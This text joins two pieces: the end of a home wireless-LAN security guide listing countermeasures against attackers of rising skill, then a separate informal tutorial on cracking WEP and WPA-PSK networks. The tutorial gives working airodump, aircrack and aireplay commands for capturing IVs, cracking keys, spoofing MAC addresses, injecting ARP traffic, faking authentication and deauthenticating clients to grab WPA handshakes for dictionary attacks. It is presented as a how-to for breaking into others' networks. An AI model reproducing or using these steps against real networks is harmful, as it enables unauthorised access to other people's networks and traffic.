Figure 2: Shutting off the radio

Countermeasure 5: MAC Address Filtering MAC Address filtering is used to control access to your AP by allowing (or denying) access to a list of wireless client MAC addresses you enter. It will prevent an unskilled intruder from connecting to your WLAN, but MAC addresses are easily captured by more skilled attackers and wireless adapter MAC addresses easily changed to match a captured address.

Figure 3: MAC Address filtering on an older USR 8011 AP

Countermeasure 6: Lower the transmit power While only a few consumer APs have this feature, lowering your transmit power can help limit intentional and accidental unauthorized connections. But with the increased sensitivity of wireless cards that even unskilled users can purchase, it may not be worth the bother - especially if you're trying to prevent unwanted connections in an apartment building or dorm.

Most skilled attackers typically use high-gain antennas, which allow them to detect very low signal levels and effectively offset this countermeasure.

Skill Level 1: Anyone with commonly available wardriving tools

Now let's move up a notch on skill level to that of your common "wardriver", who actively cruises around looking for wireless LANs. Some people wardrive for kicks to see how many wireless networks they can detect and never attempt to use the vulnerable networks they find. But others are not so benign in their intent and do connect, use and sometimes abuse unsuspecting wireless LAN owners. At Skill Level 1, I'll assume that all the countermeasures suggested for Skill Level 0 do not work and the potential intruder can see your wireless network. The only effective countermeasures at this point involve encryption and authentication. I'll save authentication for later and focus on encryption. NOTE: While forcing all wireless traffic to use a VPN (Virtual Private Network) is one solution, VPN's are notoriously difficult to set up and beyond the scope of this article. Countermeasure 7: Encryption Wireless LAN owners should run the strongest type of encryption available to them. Your choices will be dictated by the capabilities of your WLAN hardware and your options are WEP, WPA and WPA2. WEP (Wireless Equivalent Privacy) is the weakest wireless security technology, but currently the most widely deployed due to its availability on virtually all 802.11 wireless products. You may have to use it because many consumer wireless product manufacturers have opted to not provide upgrades from WEP to WPA for 802.11b products. And others are still creating new products such as some VoIP wireless phones that support only WEP, forcing some WLAN owners to downgrade their security to accomodate the lowest common level of security. Either WPA (Wi-Fi Protected Access) or WPA2 provide adequate wireless security, due to their stronger encryption technology and improved key management. The main difference between the two is that WPA2 supports stronger AES (Advanced Encryption Standard) encryption. But to further confuse users, there are some WPA-labeled products that allow the selection of AES vs. the WPAstandard TKIP encryption. Most 802.11g products support WPA (but there are exceptions), but upgrades to WPA2 for older products are still in the process of being rolled out - even though the 802.11i standard that WPA2 is based on was ratified in June 2004. I recommend that you use WPA as a minimum. It is as effective as WPA2 and, at least as I write this, more widely supported. Implementing this recommendation, however, may require purchasing new equipment, especially if you currently are using 802.11b in your WLAN. But standard 11g gear is relatively inexpensive and could be the best security investment you make. Most consumer APs support only the "Personal" version of WPA or WPA2, which is also referred to as WPA-PSK (Pre-Shared Key) (see Figure 4). WPA2 or WPA "Enterprise" (also known as WPA "RADIUS") is also supported by some consumer wireless gear, but is of little use without the additional RADIUS server required to implement it.

Figure 4: Encrypting traffic on a Netgear AP

For most personal WLANs, using WPA-PSK will provide adequate protection, but it is essential to use a key that is sufficiently long and random. Do not use a number, or a word from the dictionary, since programs such as cowpatty are already available to perform dictionary-based attacks against WPAPSK. Robert Moskowitz, Senior Technical Director ICSA Labs, recommended in this article using an 128 bit PSK. Fortunately, all WPA implementations accept alphanumeric PSKs, which would require only 16 characters to implement Mr. Moskowitz' recommendation. There are many password generators available on the Internet that can be found by a quick search. This one has lots of bells and whistles and even provides an estimation of how long it would take to crack the password it generates. As a final note, some manufacturers have started selling APs and wireless cards that promise "one touch" easy setup of secured wireless connections. Buffalo Technology had the first products based on their AOSS (AirStation One-Touch Secure Station) technology. Linksys has recently starting selling products based on similar technology from Broadcom dubbed SecureEasySetup. These offerings will be reviewed in a future article.

Skill Level 2: Anyone with WEP / WPA-PSK Cracking Skills

While WPA and WPA2 eliminate many of the problems associated with WEP, they are still vulnerable to attack, particularly in their PSK form. Many people have already cracked WEP and Parts 1 and 2 of this series provided a step-by-step procedure. Breaking the pre-shared key of WPA and WPA2 "Personal" is much harder and time consuming especially if you are using AES encryption - but it is possible.

Countermeasure 8: Add Authentication To address this emerging threat, users should implement authentication. Authentication adds another layer of security by requiring a client computer to "sign-in" to the network. Traditionally this has been done with a mix of certificates, tokens, or hand-typed passwords (also called Pre-Shared-Keys) that are negotiated with an authentication server. 802.1X provides the access control framework used by WEP, WPA and WPA2 and supports several EAP (Extensible Authentication Protocol) types that do the actual authentication. George Ou's excellent article on Authentication Protocols contains probably more than you'd ever want to know about EAP, WPA and WPA2! Configuring authentication can be a daunting and expensive task for networking professionals, let alone home networkers. At this year's RSA conference in San Francisco, for example, many attendees didn't bother to set up their wireless connection because of the full page of instructions they had to follow to do it! Thankfully, things are getting better, and you don't need to buy a full-blown RADIUS server, as there are a number of easier-to-implement alternatives. LucidLink offers a free fully-functional version of its namesake product through the end of 2005, which supports wireless security and authentication setup for up to three users. A similar product is Wireless Security Corporation's (recently purchased by McAfee) WSC Guard. It's a subscription-based product starting at $4.95 per user per month with discounts for volume purchases. A free 30 day trial download is available here. Another free option worth investigating for more experienced networkers is TinyPEAP, which adds a small RADIUS server supporting PEAP-based authentication into Linksys WRT54G and GS wireless routers. Note that since this firmware isn't officially supported by Linksys, you're on your own if you mess up your router while installing TinyPEAP.

Skill Level 3: Expert Cracker

Up until this point, we have blocked an intruder from wirelessly doing the equivalent of plugging their laptop into an Ethernet port on your LAN. But despite your best efforts, someone with expert cracking skills may penetrate all of your wireless defenses. What do you do now? There are wired and wireless LAN intrusion detection and prevention product available, but they are targeted at enterprise applications and come priced accordingly. There are also open source solutions that are unfortunately not user-friendly for networking novices. The most widely-used of these is Snort, which I hope to explore in a future article. But general network security practices have long dealt with traditional wired LAN intrusions, and can be used to combat an expert wireless intruder. Countermeasure 9: Implement general LAN security Implement the following countermeasures to improve general LAN security:

1) Require authentication to access any network resource Any server, network share, router, etc. should preferably require user-level authentication for access. Although you won't be able to implement real user-level authentication without some sort of authentication server, you can at least password-protect all shared folders and disable Guest logins if you're running Windows XP. And never share the contents of entire hard drives! 2) Segment your network In the extreme case, a computer not attached to a network is safe from network-based intrusion. But there are other ways to keep network users away from where they shouldn't be. A few properly-connected Inexpensive NAT-based routers can be used to establish firewalled LAN segments while still allowing Internet access. See this How To for the details. Switches or routers with VLAN capabilities can also be used to separate LAN users. VLAN features can be found on most any "smart" or managed switch, but are harder to come by in consumer-priced routers and unmanaged switches. 3) Bulk up your software-based protection At minimum, you need to run current versions of good anti-virus applications that automatically update their virus definition files. Personal firewalls such as ZoneAlarm, BlackICE, etc. can alert you to suspicious use of your network. And, unfortunately, the latest generaton of malware and spyware threats make adding an anti-spyware application also necessary. Webroot Software's Spy Sweeper seems to be getting good marks lately, along with Sunbelt Software's CounterSpy. Note that you must install protection on every machine on your LAN in order to have effective protection! 4) Encrypt your files Encrypting your files with strong encryption should provide effective protection in the event unauthorized users do gain access to them. Windows XP users can use Windows Encrypted File System (EFS). Mac OS X Tiger users can use FileVault. The downside to encryption is that it takes time and computing power to encrypt and de-crypt files, which could slow things down more than you'd like.

Conclusion
Wireless networking provides us with convenience, but we must take a common sense approach in securing it. There is no single thing that will shield you from attack and complete protection is very difficult to achieve against a determined intruder. But if you take the time to understand the possible risks your wireless LAN is likely to encouter, you can implement effective protection.

To Explore Further

The Unofficial 802.11 Security Page Airdefense Top 10 Wireless LAN Policy Violations NetworkWorld Protecting Wireless Networks Wardrive.net Checklist for Defending Your Wireless Network Joint Forces Staff College Defending Your Home Computer Snort Wireless List of IDS software (Commercial and Open Source)

Cracking WEP and WPA Wireless Networks

Overview
This is a good one, let me tell you! There can be so many issues setting up your box to actually get the tools working and i'm not even touching on that, but if you can get everything to work, you'll be cracking wireless networks like a pro in no time.

Pre-Installation
Checklist

Tools I've been really, really successful with basically one tool set called AirCrack. Download that. Kismet is an excellent tool for sniffing out wireless networks as well and could prove useful. An encrypted wireless network. We'll be working on WEP encrypted networks as well as static passkey WPA or WPAPSK

Note: Make sure you can get your card into monitor mode (sometimes called raw monitor or rfmon). This is VERY important

WEP Cracking
Theory
A little theory first. WEP is a really crappy and old encryption techinque to secure a wireless connection. A 3-byte vector, called an Initalization Vector or IV, is prepended onto packets and its based on a pre-shared key that all the authenticated clients know... think of it as the network key you need to authenticate. Well if its on (almost) every packet generated by the client or AP, then if we collect enough of them, like a few hundred thousand, we should be able to dramatically reduce the keyspace to check and brute force becomes a realistic proposition. A couple of things will cause us some problems.

If the key is not static, then you'll mix up all your IVs and it'll take forever to decrypt the key. Theres no traffic, therefore no packets - we can fix this. MAC Address Filtering - we can fix this too.

Setting up your tools

We're gonna need 3 or 4 shells open, we have 5 tools: airodump - Grabbing IVs aircrack - Cracking the IVs airdecap - Decoding captured packets airreplay - (My Favourite) Packet injector to attack APs. kismet - Network Sniffer, can grab IVs as well. For a standard WEP hack we'll usally only need airodump, aircrack, and kismet (server and client). If we run into some problems we might have to use airreplay to fiddle about. I'll leave you to config all these tools up, for the most part they should just be defaults with the exception of kismet.

Finding the Network

First step is we need to find a netork to crack. Start up kismet and start sniffing for APs. Leave it on for a bit so that it can discover all the important information about the networks around. What we want from kismet is:

Encryption type: Is it WEP 64-bit? 128-bit? What channel is it on? Can greatly speed up IV collection. AP's IP Address BSSID ESSID

All this info isn't required but the more you have, the more options you have later to crack and sniff. We can get a lot of this from airodump as well but I find the channel is important.

Capturing IVs
Alright, we know what we wanna crack, so lets start capturing packets. You can use kismet to capture files but I prefer airodump because it keeps a running count of all the IVs I've captured and I can crack and airodump will automatically update aircrack with new IVs as it finds them. Note: kimset can interfere with airodump so make sure you close it down before starting airodump. Airodump is pretty straight forward with its command line looking something like this:
./airodump <interface> <output prefix> [channel] [IVs flag]

interface is your wireless interface to use - required. output prefix is just the filname it'll prepend, - required. channel is the specific channel we'll scan, leave blank or use 0 to channel hop. IVs flag is either 0 or 1, depending on whether you want all packets logged, or just IVs.

My wireless card is ath0, output prefix i'll use "lucid", the channel we sniffed from kismet is 6, and IVs flag is 1 because we just want IVs. So we run:
./airodump ath0 lucid 6 1

Airodump will come up with a graph showing us all the APs and their relevant info, as well as client stations connected to any of the APs.

BSSID 00:23:1F:55:04:BC BSSID 00:23:1F:55:04:BC 00:23:1F:55:04:BC

PWR 76

Beacons 21995

# Data 213416 PWR 112 21

CH 6

MB

ENC

ESSID hackme

54. WEP

STATION 00:12:5B:4C:23:27 00:12:5B:DA:2F:6A

Packets 8202 1721

Probes hackme hackme

The second line shows us some info about the AP as well as the number of beacons and data packets we've collected from the AP. The two last lines show us two authenticated clients. Where they are connected to and the packets they are sending. We won't use this client info in a straight theory hack but in practice we'll need this info to actively attack the AP. This step may take a long time or could be very short. It depends how busy the AP is and how many IVs we are collecting. What we are doing is populating a file "lucid.ivs" with all the IV important packet info. Next, we'll feed this to aircrack. To move onto the next step, we'll want at least 100,000 packets (under # Data in airodump) but probably more.

Using IVs to Decrypt the Key

Ok, pretend you have enough IVs now to attempt a crack. Goto a new terminal (without stopping airodump - remember it'll autoupdate as new IVs are found) and we'll start aircrack. It looks something like this:
./aircrack [options] <input file>

There are a lot of options so you can look them up yourself, i'll be using common ones here that should get you a crack. Our input file is "lucid.ivs", the options we will use are:

-a 1 : forces a WEP attack mode (2 forces WPA) either -b for the bssid or -e for the essid : whichever is easier to type but I like using a BSSID because its more unique. -n 64 or -n 128 : WEP key length, omit if not known by now.
./aircrack -a 1 -b 00:23:1F:55:04:BC -n 128 lucid.ivs

So our command will look like:

and off it goes, resembling the picture from the top. Keep an eye on the Unique IV count as it should increase if airodump is still running. For all intents and purposes you are done. That'll pop open most old wireless routers with some traffic on them.

Anticipated Problems
There are lots of problems that can come up that will make the above fail, or work very slowly.

No traffic No traffic is being passed, therefore you can't capture any IVs. What we need to do is inject some special packets to trick the AP into broadcasting. Covered below in WEP Attacks MAC Address filtering AP is only responding to connected clients. Probably because MAC address filtering is

on. Using airodumps screen you can find the MAC address of authenticated users so just change your MAC to theirs and continue on. Using the -m option you can specify aircrack to filter packets by MAC Address, ex. -m 00:12:5B:4C:23:27

Can't Crack even with tons of IVs Some of the statistical attacks can create false positives and lead you in the wrong direction. Try using -k N (where N=1..17) or -y to vary your attack method. Increase the fudge factor. By default it is at 2, by specifying -f N (where N>=2) will increase your chances of a crack, but take much longer. I find that doubling the previous fudge factor is a nice progression if you are having trouble. Still Nothing Find the AP by following the signal strength and ask the admin what the WEP key is.

WPA Cracking
Differences
WPA is an encryption algorithm that takes care of a lot of the vunerablities inherent in WEP. WEP is, by design, flawed. No matter how good or crappy, long or short, your WEP key is, it can be cracked. WPA is different. A WPA key can be made good enough to make cracking it unfeasible. WPA is also a little more cracker friendly. By capturing the right type of packets, you can do your cracking offline. This means you only have to be near the AP for a matter of seconds to get what you need. Advantages and disadvantages.

WPA Flavors
WPA basically comes in two flavors RADIUS or PSK. PSK is crackable, RADIUS is not so much. PSK uses a user defined password to initialize the TKIP, temporal key integrity protocol. There is a password and the user is involved, for the most part that means it is flawed. The TKIP is not really crackable as it is a per-packet key but upon the initialization of the TKIP, like during an authentication, we get the password (well the PMK anyways). A robust dictionary attack will take care of a lot of consumer passwords. Radius involves physical transferring of the key and encrypted channels blah blah blah, look it up to learn more about it but 90% of commercial APs do not support it, it is more of an enterprise solution then a consumer one.

The Handshake
The WPA handshake was designed to occur over insecure channels and in plaintext so the password is not actually sent across. There are some fancy dancy algorithms in the background that turn it into a primary master key, PMK, and the like but none of that really matters cause the PMK is enough to connect to the network. The only step we need to do is capture a full authentication handshake from a real client and the AP.

This can prove tricky without some packet injection, but if you are lucky to capture a full handshake, then you can leave and do the rest of the cracking at home. We can force an authenication handshake by launching a Deauthentication Attack, but only if there is a real client already connected (you can tell in airodump). If there are no connected clients, you're outta luck. Like for WEP, we want to know the channel the WPA is sitting on, but the airodump command is slightly different. We don't want just IVs so we don't specify an IV flag. This will produce "lucid.cap" instead of "lucid.ivs". Assume WPA is on channel 6 and wireless interface is ath0.
./airodump ath0 lucid 6

Dictionary Brute Force

The most important part of brute forcing a WPA password is a good dictionary. Check out http://www.openwall.com/wordlists/ for a 'really' good one. It costs money, but its the biggest and best I've ever seen (40 Million words, no duplicates, one .txt file). There is also a free reduced version from the same site but i'm sure resourceful people can figure out where to get a good dictionary from. When you have a good dictionary the crack is a simple brute force attack:
./aircrack -a 2 -b 00:23:1F:55:04:BC -w /path/to/wordlist

Either you'll get it or you won't... depends on the strength of the password and if a dictionary attack can crack it.

Using Aireplay
Aireplay is the fun part. You get to manipulate packets to trick the network into giving you what you want.

WEP Attacks
Attacks used to create more traffic on WEP networks to get more IVs. ARP Injection: ARP Replay is a classic way of getting more IV traffic from the AP. It is the turtle. Slow but steady and almost always works. We need the BSSID of the AP and the BSSID of an associated client. If there are no clients connected, it is possible to create one with another WEP attack explained below: Fake Authentication Attack. With airodump listening, we attack:
./aireplay -3 -b <AP MAC Address> -h <Client MAC Address> ath0

Note: The -3 specifys the type of attack (3=ARP Replay). This will continue to run, and airodump, listening fron another terminal, will pick up any reply IVs.

Interactive Packet Replay: Interactive Packet Reply is quite a bit more advanced and requires capturing packets and constructing your own. It can prove more effective then simple ARP requests but I won't get into packet construction here. A useful attack you might try is the re-send all data attack, basically you are asking the AP to re-send you everything. This only works if the AP re-encrypts the packets before sending them again (and therefore giving you a new IV). Some APs do, some don't.
.aireplay -2 -b <AP MAC> -h <Client MAC> -n 100 -p 0841 -c FF:FF:FF:FF:FF:FF ath0

Fake Authentication Attack: This attack won't generate any more traffic but it does create an associative client MAC Address useful for the above two attacks. Its definately not as good as having a real, connected client, but you gots to do what you gots to do. This is done easiest with another machine because we need a new MAC address but if you can manually change your MAC then that'll work too. We'll call your new MAC address "Fake MAC". Now most APs need clients to reassociate every 30 seconds or so or they think they're disconnected. This is pretty arbitrary but I use it and it has worked but if your Fake MAC gets disconnected, reassociate quicker. We need both the essid and bssid and our Fake MAC.
./aireplay -1 30 -e '<ESSID>' -a <BSSID> -h <Fake MAC> ath0

If successful, you should see something like this:

23:47:29 23:47:29 23:47:30 23:47:30 Sending Authentication Request Authentication successful Sending Association Request Association successful :-)

Now you can use the above two attacks even though there were no clients connected in the first place! If it fails, there may be MAC Address Filtering on so if you really want to use this, you'll have to sniff around until a client provides you with a registered MAC to fake.

WPA Attacks
So far, the only way to really crack WPA is to force a re-authentication of a valid client. We need a real, actively connected client to break WPA. You might have to wait a while.

Deauthentication Attack
This is a simple and very effective attack. We just force the connected client to disconnect then we capture the re-connect and authentication, saves time so we don't have to wait for the client to do it themselves (a tad less "waiting outside in the car" creepiness as well). With airodump running in another console, your attack will look something like this:
.aireplay -0 5 -a <AP MAC> -c <Client MAC> ath0

After a few seconds the re-authentication should be complete and we can attempt to Dictionary Brute Force the PMK.